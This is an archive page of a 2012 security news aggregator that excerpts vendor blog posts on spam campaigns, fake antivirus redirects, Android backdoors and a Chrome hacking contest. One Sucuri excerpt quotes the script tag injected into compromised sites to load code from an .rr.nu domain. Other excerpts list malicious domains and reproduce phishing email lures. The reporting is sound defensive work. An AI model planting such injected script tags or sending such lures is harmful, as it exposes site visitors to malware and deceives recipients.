Posts Comments

You are here: Home / 2012 / Archives for February 2012

Google offers $1 million in exploit rewards for Chrome hacks

VIA Naked Security - Sophos Leave a Comment
chrome-pwned-170.jpg

Google is offering cash prizes totaling $1 million to hackers, plus a Chromebook, for those who successfully exploit its Chrome browser at the CanSecWest security conference next week. According to a blog posting put up by the company’s security team on Monday, winnings from the so-called Pwnium contest will be meted out according to the following exploit severity: $60,000 - "Full Chrome exploit": Chrome/Win7 local OS user account persistence using only bugs in Chrome itself. $40,000- "Partial Chrome

Filed Under: Sophos Tagged With: , , , , , , , , , , , , , , , , , , ,

BBB Spam / perikanzas.com and twistedtarts.net

VIA Dynamoo's Blog Leave a Comment
not-the-bbb.png

BBB spam.. you must know what it looks like by now. Here are a couple of new domains: perikanzas.com 41.64.21.71 (Dynamic ADSL, Egypt) 213.179.193.132 (Solidhost, Netherlands) twistedtarts.net 109.68.33.18 (Mesh Digital, UK)

Incoming search terms for the article:

perikanzas, perikanzas com, BBB M86 Security

Filed Under: Security Tagged With: , , , ,

“Your Flight” spam / cparabnormapoopdsf.ru

VIA Dynamoo's Blog Leave a Comment
bomb.png

This spam comes with a malicious attachment pointing to a page on cparabnormapoopdsf.ru. Date:      Tue, 27 Feb 2012 03:53:09 +0530 From:      sales1@victimdomain.com Subject:      Fwd: Your Flight N US787-8929269 Attachments:     FLIGHT_TICKET_N3988-753843.htm Dear Customer, FLIGHT NUMBER 8333-452628141 DATE/TIME : MARCH 23, 2011, 16:15 PM ARRIVING AIRPORT: WASHINGTON DC INT. AIRPORT PRICE : 856.77 USD Your bought ticket is attached to the letter as a scan document (Internet Exlporer File). To

Incoming search terms for the article:

Your bought ticket is attached to the letter as a scan document (Internet Exlporer File) To use your ticket you should print it, data protector barelist, mail betreff your flight n, your flight n 51

Filed Under: Security Tagged With: , , , , , , , , , , , , , , , , , ,

Fake AV: .ru sites used for redirections

VIA Zscaler Research Leave a Comment
fake-av-redirection-source.png

This past month, I’ve seen an increase in hijacked sites redirecting to a Fake AV page. These attacks typically involves three separate phases: The hijacked website redirects users coming from a Google search to an external domain. A website redirects users to the Fake AV page or to a harmless site (mostly bing.com and google.com) depending upon the referer in step #1. This page adds a cookie using JavaScript, and reads it immediately, to make sure the

Incoming search terms for the article:

uaroyalysdaliachu ru industry index, daliachu uaroyalys ru industry index php, qimulta ru kaspersky, la page web sur uaroyalys-daliachu ru, google hijack ru, fake webcam ru, fake security sites, daliachuuaroyalys ru/, daliachu-uaroyalys ru virus, daliachu-uaroyalys ru, url hijacked by russian site

Filed Under: Security Tagged With: , , , , , , , , , , , , , , , , , ,

Strawberry Quick Meth Warning

VIA Facecroocks Leave a Comment
strawberry_quick.jpg

The following Facebook warning has gone viral the past few days:“ALL PARENTS PLEEEASE BE AWARE!! .There is a drug going around the schools .Its known as Strawberry Quick .or strawberry meth .it looks like pop rocks kids eat & also smells like strawberries & also comes in other flavors like chocolate ect . Pleeease tell your children not to take candy from anyone even a class mate

Incoming search terms for the article:

all parents please be aware!!there is a drug going around the schools its known as strawberry quick or strawberry meth, invitation facebook virus hoax olympic torch, research in strawberry quick, strawberry color research chemical, Strawberry quick 2012, strawberry quick media, strawberry quick research chemicals, strawberry quick twitter, warning about strawberry quick

Filed Under: Facebook Tagged With: , , , , , , , , , , , , , , , , , , ,

Linsanity Leads to Targeted Malware Attacks

VIA TrendLabs Leave a Comment
linsanity_1.jpg

When there are celebrity stories such as the death of Whitney Houston in the press, we expect to see BlackHat SEO attacks and other cybercriminal campaigns using these themes to distribute malware. However, a recent targeted attack against Tibetan activists caught our attention. The lure in this case was the story of Jeremy Lin, the NBA star whose outstanding play

Incoming search terms for the article:

tibet malware, cve 3333, cve-2010-3333 tibet, jeremy lin girlfriend attack, jeremy lin on tibet, malware attack tibetan 2012, malware Jeremy Lin LURID

Filed Under: Trendmicro Tagged With: , , , , , , , , , , , , , , , , , , ,

IRS Spam / pollypeach.com

VIA Dynamoo's Blog Leave a Comment
bomb.png

Another IRS spam run leading to malware, this time on pollypeach.com. Date:      Tue, 27 Feb 2012 17:02:45 +0600 From:      “Ofelia Childers” Subject:      IRS notification of your tax appeal status. Dear Accountant Officer, Hereby you are notified that your Income Tax Return Appeal id#0184348 has been REJECTED. If you believe the IRS did not properly assess your case due to a misinterpretation

Incoming search terms for the article:

irs notification of your tax appeal status, your income tax refund appeal spam how to prevent, irs rejection spam, irs notification of your tax appeal status spam, 18008294933 email spam, irs appeal spam, Income Tax Return Appeal id, income tax return appeal, ap2 php?f=, your tax appeal status virus

Filed Under: Security Tagged With: , , , , , , , , , , , , , , , , ,

What is the definition of cybercrime?

VIA F-Secure Antivirus Research Weblog Leave a Comment
112thCongressS1469.png

Two weeks ago, the “Cybersecurity Act of 2012” was introduced in the U.S. Senate. The bill (S.2105) is designed to protect critical infrastructure such as water, energy, and transportation. It directs the U.S. Department of Homeland Security (DHS) to coordinate with network operators on developing security standards. A related bill, the “Cybersecurity Information Sharing Act of 2012” (S.2102) was introduced on February 13th. Naturally, civil liberties group such as the EFF and EPIC

Filed Under: F-Secure Tagged With: , , , , , , , , , , , , , , , , , , ,

BBB and AICPA spam / 110hobart.com

VIA Dynamoo's Blog Leave a Comment
not-the-bbb.png

Two spam runs with essentially the same malicious payload.. Date:      Mon, 26 Feb 2012 12:30:50 +0100 From:      “BBB” Subject:      BBB case ID 73773062 Attachments:     betterbb_logo.jpg Attention: Owner/Manager Here with the Better Business Bureau notifies you that we have been sent a complaint (ID 73773062) from your customer in regard to their dealership with you. Please open the COMPLAINT

Incoming search terms for the article:

aicpa spam report, 41 64 21 71

Filed Under: Security Tagged With: , , , , , , , , , , , , , , , , ,

Android.Anzhu-new backdoor for Android devices

VIA Virus alerts Leave a Comment
Anzhu_1_1.png

The Russian anti-virus vendor Doctor Web warns Internet users of a new backdoor for Android. Android.Anzhu can implement a variety of directives received from a remote server, covertly install other applications and change browser bookmarks. Android.Anzhu is distributed from Chinese sites offering free software for Android. The backdoor is built into the legitimate program Screen Off And Lock, designed to lock the screen and turn off the mobile device

Filed Under: DrWeb Tagged With: , , , , , , , , , , , , , , , , , , ,

Don’t shoot the messenger

VIA avast! blog Leave a Comment
blackhole1-300x219.png

Not everyone appreciates an avast! warning. Some IT professionals find it hard to believe that an infection has taken place on the computers and the networks under their supervision. “In today’s update you have included their website as being infected and harmful,” complained one web developer in an email to AVAST Software. “For the last month, it has been a

Incoming search terms for the article:

joomla blackhole exploit kit remove

Filed Under: Avast Tagged With: , , , , , , , , , , , , , , , , ,

How to delete your Google Web History before the new privacy policy takes effect

VIA Facecroocks Leave a Comment
google_search-150x150.jpg

By now, everyone has probably heard about Google’s privacy policy update that is to go into effect March 1, 2012. The long and short of the change is that Google may combine information collected from one service and share it with other Google products. (Gmail, Youtube, Search, Google+, etc.) Google wants to treat you as a single user across all their

Incoming search terms for the article:

how to stop kaspersky from recording web history, m86 google privacy march 1 2012, please erase gawker on google history

Filed Under: Facebook Tagged With: , , , , , , , , , , , , , , , , , ,

Malware Campaign from .rr.nu

VIA Sucuri Leave a Comment

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD. This is what gets added to the footer of the hacked sites: <script  src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script> Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but using

Incoming search terms for the article:

194 28 114 103, pmg php, script injection rr nu, rr nu malware, rr nu injection, rr nu, php injection rr nu, hacked pages php rr nu, g rr nu malware, security rr nu domain

Filed Under: Security Tagged With: , , , , , , ,

Android.Moghava: A Recipe for Mayhem

VIA Symantec Security Response Blog Leave a Comment

When you know that the goal of a piece of code is to ultimately result in monetary gain for the author, analysis becomes a lot easier; it is a matter of just putting the pieces together until you can figure out how the payload is translated into tangible value. But take away the monetary gain element and, even if you are able to find out what

Incoming search terms for the article:

android moghava kaspersky, f-secure moghava

Filed Under: Symantec Tagged With: , , , , , , , , , , , , , , , , , , ,

The Pink Facebook rogue application and survey scam

VIA Naked Security - Sophos Leave a Comment
facebook-pink-170.jpg

There’s just no pleasing Facebook users. They complain when Facebook decides to change the look of the social network (think, Timeline), and then they want to make pointless cosmetic changes of their own – such as changing Facebook from its traditional blue to a garish pink. That’s the lure being used by some Facebook scams actively spreading

Filed Under: Sophos Tagged With: , , , , , , , , , , , , , , , , , , ,

Beatles for Sale? It’s spam of the day

VIA Naked Security - Sophos Leave a Comment
beatles-170.jpg

I’ve owned up to some of the great loves of my life in the past, here on Naked Security. For instance, I’m a life-long fan of Doctor Who, and I’m very partial to a game of chess (even during a denial-of-service attack). Today I can also share that I love The Beatles. In particular, anything from “Rubber Soul” and later when the “Yeah yeah yeah”

Incoming search terms for the article:

beatles cream, beatles for sale

Filed Under: Sophos Tagged With: , , , , , , , , , , , , , , , , , , ,
« Older Posts